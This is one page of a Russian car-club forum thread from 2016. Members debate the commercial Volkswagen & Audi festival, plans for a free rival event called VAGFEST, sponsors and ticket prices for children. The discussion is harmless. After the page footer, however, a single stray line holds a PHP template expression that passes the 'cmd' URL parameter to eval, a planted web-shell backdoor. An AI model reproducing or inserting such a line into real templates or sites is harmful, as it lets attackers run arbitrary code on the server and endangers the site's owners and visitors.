+ Ответить в теме
Страница 6 из 12 ПерваяПервая ... 4 5 6 7 8 ... ПоследняяПоследняя
Показано с 51 по 60 из 120

Тема: 10-й юбилейный Volkswagen & Audi festival 28 мая 2016 - составляем списки кто едет!!!


  1. #51
    GTI-Racing 01RUS is on a distinguished road Аватар для 01RUS
    Регистрация
    19.09.2011
    Откуда
    Москва
    Машина
    VW GOLF 7 GTI
    Сообщений
    479
    Цитата Сообщение от crazy_engineer Посмотреть сообщение
    Большое спасибо)


    Спасибо!!!
    Приятно читать что не только я замечаю расхождение названия и заявлений организаторов с тем что в действительности происходит на Volkswagen & Audi festival. Но в тоже время очень-очень многие его боготворят, а значит он не так уж и плох.
    Боготворят обычно люди без своего я, подверженные моде и не имеющие своего мнения.
    Но не побоюсь сказать, что далеко не все такие.
    Не так уж плох, потому что это пока единственный фестиваль подобного масштаба,
    за что конечно респект организаторам! Но для того чтобы фан движение Ваговодов в России развивалось быстрее, интереснее и не в одной плоскости, а в разных направлениях, обязательно должна быть конкуренция.
    Иначе без альтернатив будет аналог РЖД и Почты России.
    Так что Вдим вперёд! Нужна помощь, пиши. Поможем чем можем.
    Последний раз редактировалось 01RUS; 11.03.2016 в 20:58.
    O1RUS

    GOLF 7 GTI OEM

  2. #52
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Цитата Сообщение от 01RUS Посмотреть сообщение
    ...Так что Вадим вперёд! Нужна помощь, пиши. Поможем чем можем.
    Спасибо) Уже помогаете) Помогаете тем что пишете о необходимости нового фестиваля - дело в том что и посей день у меня есть некоторые сомнения в целесообразности создания альтернативного праздника! Сомнения основаны на том что начиная с 2010 года я много раз слышал от товарищей и читал на различных форумах о призывах и даже конкретных намереньях создать альтернативный VAG-фестиваль, но при этом никто ничего не сделал. Точнее сделано очень много: многие дружные компании и даже целые автоклубы принципиально перестали участвовать в Volkswagen & Audi festival и появилось много локальных фестивалей типа "Кармашка-фест" у Гольф-клуба, "Шашлыкинг Мk4" у Гольф4клуба и т.п. Но полноценной альтернативы так и не создали. Поэтому и возникают сомнения в том что она нужна...


    Цитата Сообщение от 01RUS Посмотреть сообщение
    ...На для того чтобы фан движение Ваговодов в России развивалось быстрее, интереснее и не в одной плоскости, а в разных направлениях, обязательно должна быть конкуренция. Иначе без альтернатив будет аналог РЖД и почты России.
    Спасибо) Про РЖД и Почту России очень метко написал)))) Но конкуренции как токовой не получится потому что Виктор Коротков ШОРТ очень умный бизнесмен и умело собирает достаточно большой бюджет фестиваля, в первую очередь за счет эффективной продажи билетов на вход - что позволяет ему арендовать дорогие комфортабельные площадки, нанимать для развлекательных выступлений знаменитого дрифтера на Тойота Супра, заказывать и дарить участникам тысячи футболок с лого фестиваля, проводить розыгрыш настоящего автомобиля и т.д. А на VAGFEST принципиально не будут продаваться билеты на вход/въезд и соответственно все перечисленные развлечения не по карману. Если говорить что VAGFEST будет конкурировать с Volkswagen & Audi festival то образно говоря это примерно тоже самое что говорить о конкуренции любительских заездов на Киевке и насквозь коммерческой Формулы1 - т.е. за счет очень большого бюджета Volkswagen & Audi festival всегда будет масштабней и круче и скорее всего да же не будет замечать скромный народный VAGFEST :)

  3. #53
    GTI-Racing 01RUS is on a distinguished road Аватар для 01RUS
    Регистрация
    19.09.2011
    Откуда
    Москва
    Машина
    VW GOLF 7 GTI
    Сообщений
    479
    Цитата Сообщение от crazy_engineer Посмотреть сообщение
    Спасибо) Уже помогаете) Помогаете тем что пишете о необходимости нового фестиваля - дело в том что и посей день у меня есть некоторые сомнения в целесообразности создания альтернативного праздника! Сомнения основаны на том что начиная с 2010 года я много раз слышал от товарищей и читал на различных форумах о призывах и даже конкретных намереньях создать альтернативный VAG-фестиваль, но при этом никто ничего не сделал. Точнее сделано очень много: многие дружные компании и даже целые автоклубы принципиально перестали участвовать в Volkswagen & Audi festival и появилось много локальных фестивалей типа "Кармашка-фест" у Гольф-клуба, "Шашлыкинг Мk4" у Гольф4клуба и т.п. Но полноценной альтернативы так и не создали. Поэтому и возникают сомнения в том что она нужна...



    Спасибо) Про РЖД и Почту России очень метко написал)))) Но конкуренции как токовой не получится потому что Виктор Коротков ШОРТ очень умный бизнесмен и умело собирает достаточно большой бюджет фестиваля, в первую очередь за счет эффективной продажи билетов на вход - что позволяет ему арендовать дорогие комфортабельные площадки, нанимать для развлекательных выступлений знаменитого дрифтера на Тойота Супра, заказывать и дарить участникам тысячи футболок с лого фестиваля, проводить розыгрыш настоящего автомобиля и т.д. А на VAGFEST принципиально не будут продаваться билеты на вход/въезд и соответственно все перечисленные развлечения не по карману. Если говорить что VAGFEST будет конкурировать с Volkswagen & Audi festival то образно говоря это примерно тоже самое что говорить о конкуренции любительских заездов на Киевке и насквозь коммерческой Формулы1 - т.е. за счет очень большого бюджета Volkswagen & Audi festival всегда будет масштабней и круче и скорее всего да же не будет замечать скромный народный VAGFEST :)
    Ну во первых он не за год добился того, что есть сейчас, во вторых, если грамотно начать, в последствии можно и билеты продавать и спонсоров находить. Было бы желание.
    А по поводу Киевки, нужно изначально ставить для себя высокую планку и держать её.
    Когда нет высокой мотивации, не будет и результата.
    А про Формулу 1, ты конечно загнул )
    Последний раз редактировалось 01RUS; 11.03.2016 в 21:01.
    O1RUS

    GOLF 7 GTI OEM

  4. #54
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Руслан, ты все правильно написал.
    Но кажется я неправильно выразил свои мысли и тем самым исказил смысл того что хотел сказать. Постараюсь со второй попытки написать грамотно:

    Цитата Сообщение от 01RUS Посмотреть сообщение
    Ну во первых он не за год добился того, что есть сейчас...
    Все верно - Виктору Короткову потребовался не один год, но я имел в виду что начиная с 2010 года я слышал/читал о многих людях которые намеревались сделать фестивали альтернативные Volkswagen & Audi festival, но пока не сделали. Причем некоторых из этих людей я хорошо знаю и объективно оцениваю что они умнее меня, более авторитетны и харизматичны, обладают гораздо большими финансовыми ресурсами, гораздо больше чем я фанатично любят VAG и что самое главное - имеют очень много друзей. Поэтому у меня и возникают сомнения в целесообразности когда я на протяжении уже 6-ти лет вижу что более способные чем я и обладающие большим потенциалом люди не спешат реализовывать свою мечту! Может умные люди видят что-то что из-за невнимательности или/и некомпетентности пропустил я?
    Но не смотря на сомнения я полон решимости работать до получения положительного результата :)

    Цитата Сообщение от 01RUS Посмотреть сообщение
    ...во вторых, если грамотно начать, в последствии можно и билеты продавать и спонсоров находить. Было бы желание.
    Про грамотно начать - золотые слова! И Виктор Коротков с самого начала - с первого фестиваля в 2007 году стал продавать билеты участникам и естественно это очень грамотно так как цель зарабатывать, а Volkswagen & Audi festival это его основное место работы [не считая BMW Festival и Makeupdays] Я же принципиально против того чтобы вход/въезд на VAGFEST-е был платным, по многим причинам и в том числе потому что у меня есть работа, а проведение фестиваля это увлечение. Про спонсоров ты тоже все правильно написал, но я спешу похвалиться - спонсоры у VAGFEST-а были уже в первый год его проведения и будут в этом году. Конечно они очень скромные и не платят по 800 тысяч рублей как у Volkswagen & Audi festival, но я всячески стараюсь на всем экономить и использовать максимально рационально имеющиеся ресурсы поэтому нам почти хватает :)

    Цитата Сообщение от 01RUS Посмотреть сообщение
    А по поводу Киевки, нужно изначально ставить для себя высокую планку и держать её.
    Когда нет высокой мотивации, не будет и результата.
    А про Формулу 1, ты конечно загнул )
    Пожалуйста, извини - тут я тоже тебя запутал своим некорректным примером - а хотел я всего лишь сказать что любительское мероприятие [как например, заезды по Киевке] почти всегда будет проигрывать профессиональному [например, Формуле 1] по масштабу, по количеству участников, по престижности, по пафосности и т.д. Поэтому наш народный VAGFEST по определению не конкурент профессионально организованному Volkswagen & Audi festival. И в этом нет ничего плохого, так как наша цель не продать как можно больше и дороже билетов и для этого собрать максимальное количество людей, а весело провести время - чтобы хорошо веселиться совершенно не обязательно быть большим фестивалем и с кем то конкурировать :) Например, по пятницам под мостом собирается всего несколько десятков человек [а не более 7'000 как на Volkswagen & Audi festival] и GTI-club не с кем не конкурирует, но при этом нам все равно весело и интересно ;)
    И повторюсь - владелец Volkswagen & Audi festival скорее всего даже не заметит какого либо влияния VAGFEST-а на его бизнес, а вот для небольшой группы требовательных любителей VAG появится альтернатива.
    Про "высокую мотивацию" и "высоко поставленную планку" опять же полностью с тобой согласен и поэтому намереваюсь с вами вместе взять почти недостижимую высоту - проводить трехдневные фестивали с кемпингом с минимальным стремящимся к нулю количеством пьяных дебошей ;)
    Последний раз редактировалось crazy_engineer; 14.03.2016 в 04:39.

  5. #55
    GTI-Racing 01RUS is on a distinguished road Аватар для 01RUS
    Регистрация
    19.09.2011
    Откуда
    Москва
    Машина
    VW GOLF 7 GTI
    Сообщений
    479
    Спешу тебя порадовать, Вадим, есть довольно большой кусок пирога, который не ездит на мероприятия Виктора принципиально. Уже года два точно. И с каждым годом таких людей всё больше и больше. Потому что слишком большой перевес стал в сторону получения прибыли, а не интересного шоу для всех участников фестиваля в разных направлениях и категориях. Угадай к кому эти люди приедут с большим удовольствием?
    O1RUS

    GOLF 7 GTI OEM

  6. #56
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Цитата Сообщение от 01RUS Посмотреть сообщение
    Спешу тебя порадовать, Вадим, есть довольно большой кусок пирога, который не ездит на мероприятия Виктора принципиально. Уже года два точно. И с каждым годом таких людей всё больше и больше...
    Руслан, ты прав! К сожалению прав! К сожалению - потому что я тоже давно начал замечать этот процесс и теоретически примерно оценивал число таких людей, но когда в прошлом году я начал приглашать всех на первый VAGFEST то был шокирован тем что таких людей не просто много, а очень много - гораздо больше чем я себе представлял. Но это еще полбеды, а настоящая беда в том что разочаровавшись в Volkswagen & Audi festival многие из этих людей теперь скептически и даже негативно относятся вообще к любым новым фестивалям. Поэтому одна из важных задач которая стоит перед VAGFEST-ом, как бы это странно не звучало на первый взгляд, попытаться помочь Volkswagen & Audi festival стать лучше чтобы он меньше портил общественное мнение о фестивалях. Сделать это будет очень сложно, так как я уже начиная с 2011 года периодически пытаюсь предложить Виктору Короткову безвозмездно свою помощь в исправлении хотя бы части недостатков, но каждый раз натыкаюсь на непреступную стену.

    Цитата Сообщение от 01RUS Посмотреть сообщение
    ...Потому что слишком большой перевес стал в сторону получения прибыли, а не интересного шоу для всех участников фестиваля в разных направлениях и категориях.
    Сделать интересно для всех крайне сложно, так как не смотря на общую любовь к VAG-у все мы разные и имеем разные представления об том каким должен быть идеальный VAG-праздник :) Напишу немного в защиту Виктора Короткова - он все же пытается предлагать различные развлечения, например, прочитал в его рекламе что на Volkswagen & Audi festival он даже осуществляет дословно: БЕСПЛАТНУЮ раздачу сахарной ваты и газированных напитков! Конечно это далеко не самое важное развлечение для фестиваля автолюбителей, но показывает его стремление понравится разным участникам, в частности любителям сладкого и детям. К сожалению нужно честно признать что и VAGFEST не сможет сразу сделать интересные развлечения абсолютно для всех участников :( Но если мы все вместе дружно постараемся - то уверен все у нас со временем получится :).
    Последний раз редактировалось crazy_engineer; 14.03.2016 в 05:00.

  7. #57
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Сибираемся



    Цитата Сообщение от 01RUS Посмотреть сообщение
    +1.
    У шортовского стэнсофеста должна быть более интересная альтернатива,
    доступная и понятная большей части Ваговодов,
    а не только владельцам пузотёрок.
    Это правильно, нормальным алроудам будет где показаться))))
    песок сыпется....не останавливайтесь на достигнутом !

  8. #58
    GTI-Racing Gizka is on a distinguished road Аватар для Gizka
    Регистрация
    24.05.2010
    Откуда
    Москва
    Машина
    семейный авто
    Сообщений
    221
    Вадик, ты в теме, скажи пожалуйста, билеты не зависимо от возраста минимум 800? Или же на детей есть скидка? Хотела с собой двоих взять: 2,5 года и 10 лет, если все-таки удастся приехать (каждый раз планирую и все пока никак).
    Жизнь — забавный подарок. Поначалу этот подарок переоценивают: думают, что им вручили вечную жизнь. После — ее недооценивают, находят никудышной, слишком короткой, почти готовы бросить ее. И наконец, сознают, что это был не подарок, жизнью просто дали попользоваться. И тогда ее пытаются ценить. (c)

  9. #59
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Цитата Сообщение от Gizka Посмотреть сообщение
    Вадик, ты в теме, скажи пожалуйста, билеты не зависимо от возраста минимум 800? Или же на детей есть скидка? Хотела с собой двоих взять: 2,5 года и 10 лет, если все-таки удастся приехать (каждый раз планирую и все пока никак).
    Сайт Volkswagen & Audi festival лежит второй день подряд, до того как он упал - там было написано что дети до 14 лет бесплатно.

  10. #60
    Новичок GTI676 is on a distinguished road Аватар для GTI676
    Регистрация
    05.08.2014
    Откуда
    MO, Odicity
    Машина
    GTI mk6 st.1, borla exhaust, apexi inake
    Сообщений
    193
    Закупаться будем в конце марта примерно?

+ Ответить в теме
Страница 6 из 12 ПерваяПервая ... 4 5 6 7 8 ... ПоследняяПоследняя

Похожие темы

  1. Встреча на озере Worthersee 2016
    от Bahus в разделе Встречи и мероприятия
    Ответов: 19
    Последнее сообщение: 18.02.2019, 19:40
  2. Ответов: 1
    Последнее сообщение: 20.07.2013, 16:19
  3. Фото Audi Festival 2011
    от BON в разделе Клубные фотки и видео
    Ответов: 14
    Последнее сообщение: 26.09.2011, 19:31
  4. Volkswagen Golf 4 Юбилейный Выпуск Limited Edition
    от sidr в разделе Покупка и продажа авто
    Ответов: 14
    Последнее сообщение: 12.10.2010, 10:33
  5. Russian VolksWagen Festival 2007!
    от RisK в разделе Курилка
    Ответов: 0
    Последнее сообщение: 15.08.2007, 16:17

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}